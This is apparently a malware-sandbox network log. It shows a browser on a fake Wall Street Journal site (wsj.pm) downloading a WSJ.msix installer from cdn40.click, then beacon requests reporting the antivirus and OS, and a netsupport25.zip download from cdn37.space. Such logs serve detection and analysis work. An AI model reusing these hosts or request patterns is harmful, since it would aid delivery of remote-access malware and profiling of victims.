Source: global traffic	HTTP traffic detected: GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/wsj-social-share.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949345.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949675.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-948848.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/AM.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/AM.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-948629.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949113.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/wsj-social-share.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949345.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949675.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949723.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-948848.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-44291453.avif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-647221.avif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/google-play.4699f3c2.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/appstore.a6e93ba3.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/AM.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-948629.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/AM.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949113.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949723.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-44291453.avif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-647221.avif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/google-play.4699f3c2.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/appstore.a6e93ba3.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: 120X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAfzLBKdQCm28CuuxSNuYztu7EsL7kM769LErRWmNGF0YaycAS/EF10D5AFL6ce5V6NubDyyAlEankxphWwbF3Zkcodae1JTiS82W5IqxsAZeIGIp7QaY6JTHKtRqt6KEyC7zcbmSdNqvjmfJnoE%2BYuJIWIOMvj9e61j67iSOsaW5yPtDm6A2Ko8k4kHvl9/y4OUYw7tos%2BqX7a4ajNojcn/%2BDbwK3H1IdFpEKv1oyFblwSLD/wqQ%2BOO4/XbmYMWd13OqRnoWy5/spJAcJnE8ZC9LKpqS2jPGInoQC6TbPU/y5J%2BxITZtEzQSCHjr16fdOhoPhBPAuaWyDmETEVNgdiwDZgAACKN/6GJ5hpirqAEcFppM/deTNK56h1fTsecQj6efW5sXGKIkb3Vb8yln%2BfGBzzH0wpS8cDLWTHoIgQzzC8PG/u1cCyFQ4nVgzCHM/ePS3Oe6yjui0nWDzNf2nMzcumEakiioNdNK/kN%2B1GY321OPE3p/BvtKwSMdr1%2Bc2IySS9Vc5o2PMLFR0q9euc9w%2BfJliN1EmcTHg9RYAomP3lXn763OoOEhblBx/VJrrUuwAaONp6Htg2s9szOieqv9dfGEkmwIUPkreePKED3QSTHdizIvkyD2ArEj181uEfEKFN0m7phP9ItbB05/LfQ82qVa7S6QucixnvjrolClT5Lwdc9T1w9T2XaIOYyzpmi%2BzcvTSudcp03zV9iyFr63AAle78T86hWtHziucLicgJTKDs/b8TV2EpUjPEIBRV2u81H4fMkbTaoOHVey9jj6iYx%2B/pAGeatoNz1Bsbn1XMcY5R9nv379Aax/6bj%2Brwhs6trImm9Q3jabPfKdI0HDeiZI747w1MqX/lOOi61lecoVwppq42ulTvxSMkQNCgWZN5djPBDl1ScMHpQTrnIAlpjTeycr2gE%3D%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1714057116User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 75625C546F974997B6B8D64F1964277DX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic	HTTP traffic detected: GET /download.php HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /files/WSJ.msix HTTP/1.1Host: cdn40.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /download.php HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1User-Agent: myUserAgentHereHost: cdn40.clickConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsd&iud=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1User-Agent: myUserAgentHereHost: cdn37.spaceConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/netsupport25.zip HTTP/1.1Host: cdn37.space
Source: global traffic	HTTP traffic detected: GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1User-Agent: myUserAgentHereHost: cdn40.clickConnection: Keep-Alive
